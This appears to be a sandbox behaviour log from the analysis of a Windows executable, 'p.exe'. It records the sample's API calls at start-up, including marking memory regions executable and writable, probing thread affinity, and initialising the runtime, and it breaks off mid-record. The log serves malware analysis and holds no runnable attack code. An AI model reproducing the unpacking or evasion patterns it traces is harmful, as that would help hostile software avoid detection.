# Flog Txt Version 1 # Analyzer Version: 3.2.2 # Analyzer Build Date: Jun 3 2020 08:38:37 # Log Creation Date: 03.09.2020 22:53:50.535 Process: id = "1" image_name = "p.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p.exe" page_root = "0x4457d000" os_pid = "0xaec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x454" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 1 os_tid = 0xae0 [0047.815] LocalAlloc (uFlags=0x0, uBytes=0xa8) returned 0xeb88d8 [0047.818] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0047.819] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0047.827] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x18ff1c | out: Wow64Process=0x18ff1c) returned 1 [0047.960] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x18fb10, nSize=0xfe | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p.exe")) returned 0x2b [0047.961] NtOpenFile (in: FileHandle=0x18fac4, DesiredAccess=0x80100080, ObjectAttributes=0x18fa80*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x18fab4, ShareAccess=0x3, OpenOptions=0x60 | out: FileHandle=0x18fac4*=0xbc, IoStatusBlock=0x18fab4*(Status=0x0, Pointer=0x28600000000, Information=0x1)) returned 0x0 [0047.962] NtCreateSection (in: SectionHandle=0x18fac0, DesiredAccess=0x4, ObjectAttributes=0x18fa90*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), MaximumSize=0x0, SectionPageProtection=0x2, AllocationAttributes=0x8000000, FileHandle=0xbc | out: SectionHandle=0x18fac0*=0xc0) returned 0x0 [0047.963] NtMapViewOfSection (in: SectionHandle=0xc0, ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fab4*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x18fdc400000000, ViewSize=0x18faac*=0x0, InheritDisposition=0x100000000, AllocationType=0x0, AccessProtection=0x0 | out: BaseAddress=0x18fab4*=0x0, SectionOffset=0x18fdc400000000, ViewSize=0x18faac*=0x0) returned 0xc00000f6 [0047.963] NtClose (Handle=0xc0) returned 0x0 [0047.963] NtClose (Handle=0xbc) returned 0x0 [0047.964] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x42f000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x40, OldAccessProtection=0x18fdf0 | out: BaseAddress=0x18fac8*=0x42f000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fdf0*=0x20) returned 0x0 [0047.970] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x41e000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x4, OldAccessProtection=0x18fdf0 | out: BaseAddress=0x18fac8*=0x41e000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fdf0*=0x2) returned 0x0 [0047.970] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x401000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x40, OldAccessProtection=0x18fdf0 | out: BaseAddress=0x18fac8*=0x401000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fdf0*=0x20) returned 0x0 [0047.971] NtProtectVirtualMemory (in: ProcessHandle=0xffffffffffffffff, BaseAddress=0x18fac8*=0x454000, NumberOfBytesToProtect=0x18fac0, NewAccessProtection=0x4, OldAccessProtection=0x18fdf0 | out: BaseAddress=0x18fac8*=0x454000, NumberOfBytesToProtect=0x18fac0, OldAccessProtection=0x18fdf0*=0x80) returned 0x0 [0047.972] LocalAlloc (uFlags=0x0, uBytes=0x3e6c) returned 0xeb8988 [0049.580] LocalFree (hMem=0xeb8988) returned 0x0 [0049.580] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x76d30000 [0049.580] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.581] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.581] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.582] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.583] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.583] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.583] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.585] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77130000 [0049.589] GetModuleHandleA (lpModuleName="GDI32.dll") returned 0x770a0000 [0049.590] GetModuleHandleA (lpModuleName="comdlg32.dll") returned 0x77270000 [0049.590] GetModuleHandleA (lpModuleName="WINSPOOL.DRV") returned 0x75480000 [0049.590] GetModuleHandleA (lpModuleName="ADVAPI32.dll") returned 0x77710000 [0049.591] GetModuleHandleA (lpModuleName="SHELL32.dll") returned 0x759d0000 [0049.591] GetModuleHandleA (lpModuleName="COMCTL32.dll") returned 0x754e0000 [0049.592] GetModuleHandleA (lpModuleName="SHLWAPI.dll") returned 0x772f0000 [0049.592] GetModuleHandleA (lpModuleName="OLEAUT32.dll") returned 0x76e40000 [0049.593] GetModuleHandleA (lpModuleName="WTSAPI32.dll") returned 0x75470000 [0049.593] GetModuleHandleA (lpModuleName="KERNEL32.dll") returned 0x76d30000 [0049.595] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.595] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.595] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.595] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.597] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.597] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.597] GetModuleHandleA (lpModuleName="NTDLL") returned 0x77c40000 [0049.598] GetModuleHandleA (lpModuleName="USER32.dll") returned 0x77130000 [0049.599] NtQueryVirtualMemory (in: ProcessHandle=0xffffffffffffffff, Address=0xeb88d8, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18fa9c, Length=0x30, ResultLength=0x0 | out: VirtualMemoryInformation=0x18fa9c, ResultLength=0x0) returned 0x80000002 [0049.599] NtQueryVirtualMemory (in: ProcessHandle=0xffffffffffffffff, Address=0xd21000, VirtualMemoryInformationClass=0x0, VirtualMemoryInformation=0x18fa9c, Length=0x30, ResultLength=0x0 | out: VirtualMemoryInformation=0x18fa9c, ResultLength=0x0) returned 0x80000002 [0049.631] GetProcessAffinityMask (in: hProcess=0xffffffff, lpProcessAffinityMask=0x18fea4, lpSystemAffinityMask=0x18fee4 | out: lpProcessAffinityMask=0x18fea4, lpSystemAffinityMask=0x18fee4) returned 1 [0049.632] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0049.632] Sleep (dwMilliseconds=0x0) [0049.634] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x1) returned 0x1 [0049.634] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x2) returned 0x0 [0049.635] Sleep (dwMilliseconds=0x0) [0049.639] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0049.640] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x4) returned 0x0 [0049.640] Sleep (dwMilliseconds=0x0) [0049.650] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0049.651] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x8) returned 0x0 [0049.651] Sleep (dwMilliseconds=0x0) [0049.651] SetThreadAffinityMask (hThread=0xfffffffe, dwThreadAffinityMask=0x0) returned 0x0 [0049.652] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f9d0 | out: lpSystemTimeAsFileTime=0x18f9d0*(dwLowDateTime=0x31805a90, dwHighDateTime=0x1d68245)) [0049.652] GetCurrentProcessId () returned 0xaec [0049.652] GetCurrentThreadId () returned 0xae0 [0049.652] GetTickCount () returned 0x1147762 [0049.652] QueryPerformanceCounter (in: lpPerformanceCount=0x18f9c8 | out: lpPerformanceCount=0x18f9c8*=16954543802) returned 1 [0049.652] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x250000 [0049.653] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.653] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0049.654] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0049.654] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0049.654] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0049.654] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.654] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.654] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.655] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.655] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.655] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.655] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.655] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.656] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.656] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.656] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.657] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0049.657] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x214) returned 0x2507d0 [0049.657] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.657] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0049.658] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0049.658] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0049.658] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0049.658] GetCurrentThreadId () returned 0xae0 [0049.658] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe\" " [0049.658] GetEnvironmentStringsW () returned 0xeb8988* [0049.658] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381 [0049.659] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x565) returned 0x2509f0 [0049.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x2509f0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381 [0049.659] FreeEnvironmentStringsW (penv=0xeb8988) returned 1 [0049.659] GetStartupInfoA (in: lpStartupInfo=0x18f920 | out: lpStartupInfo=0x18f920*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0049.659] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x800) returned 0x250f60 [0049.659] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0049.659] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0049.659] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0049.659] SetHandleCount (uNumber=0x20) returned 0x20 [0049.659] GetLastError () returned 0x0 [0049.659] SetLastError (dwErrCode=0x0) [0049.659] GetLastError () returned 0x0 [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetLastError () returned 0x0 [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetACP () returned 0x4e4 [0049.660] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x0, Size=0x220) returned 0x251768 [0049.660] GetLastError () returned 0x0 [0049.660] SetLastError (dwErrCode=0x0) [0049.660] IsValidCodePage (CodePage=0x4e4) returned 1 [0049.660] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f900 | out: lpCPInfo=0x18f900) returned 1 [0049.660] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f3cc | out: lpCPInfo=0x18f3cc) returned 1 [0049.660] GetLastError () returned 0x0 [0049.660] SetLastError (dwErrCode=0x0) [0049.660] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f35c | out: lpCharType=0x18f35c) returned 1 [0049.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7e0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0049.660] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7e0, cbMultiByte=256, lpWideCharStr=0x18f148, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ璘鲒DĀ") returned 256 [0049.660] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ璘鲒DĀ", cchSrc=256, lpCharType=0x18f3e0 | out: lpCharType=0x18f3e0) returned 1 [0049.661] GetLastError () returned 0x0 [0049.661] SetLastError (dwErrCode=0x0) [0049.661] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0049.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7e0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0049.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7e0, cbMultiByte=256, lpWideCharStr=0x18f118, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ攺DĀ") returned 256 [0049.661] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ攺DĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0049.661] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ攺DĀ", cchSrc=256, lpDestStr=0x18ef08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0049.661] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18f6e0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿæ\x99ËÃ\x18ù\x18", lpUsedDefaultChar=0x0) returned 256 [0049.661] GetLastError () returned 0x0 [0049.661] SetLastError (dwErrCode=0x0) [0049.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7e0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0049.661] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f7e0, cbMultiByte=256, lpWideCharStr=0x18f138, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ攺DĀ") returned 256 [0049.661] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ攺DĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0049.661] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ攺DĀ", cchSrc=256, lpDestStr=0x18ef28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0049.661] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18f5e0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" 